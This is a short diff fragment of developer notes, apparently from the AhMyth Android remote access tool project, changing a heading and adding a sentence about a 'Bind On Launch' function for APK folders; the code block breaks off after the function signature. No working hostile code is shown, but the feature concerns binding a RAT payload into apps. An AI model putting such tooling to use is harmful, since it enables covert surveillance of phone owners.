Morsmalleo/AhMyth/.github/Dev/Server_Updates.md

 }
 ```

-## New Complete Bind On Launch function for Windows, Linux & macOS!
+# New Complete Bind On Launch function for Windows, Linux & macOS!

+This one was a bit of a pain to manage, but it was done in the end, this future update will be used in the next release until something using `fs` can be constructed, in order to use less coding.

 ```js
     $appCtrl.BindOnLauncher = (apkFolder) => {